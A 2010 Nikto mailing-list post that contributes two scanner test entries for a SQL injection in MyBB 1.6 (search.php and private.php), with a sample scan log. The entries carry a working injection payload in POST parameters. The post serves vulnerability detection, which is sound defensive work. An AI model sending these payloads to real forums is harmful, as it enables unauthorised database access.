[Nikto-discuss] [db_tests] new entry - myBB SQL Injection
YGN Ethical Hacker Group
lists at yehg.net
Thu Dec 23 12:34:24 CST 2010
udb_tests
=========
"400000","0","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBB 1.6 <= SQL Injection, ref: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""
"400001","0","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBB 1.6 <= SQL Injection, ref: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""
Testing
========
>perl nikto.pl -h http://attacker.in -root /mybb -useproxy
+ Target Port: 80
+ Proxy: localhost:8080
+ Start Time: 2010-12-25 02:28:34
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 DAV/2
+ /search.php: MyBB 1.6 <= SQL Injection, ref: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
+ 2 items checked: 0 error(s) and 1 item(s) reported on remote host
+ End Time: 2010-12-25 02:28:52 (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd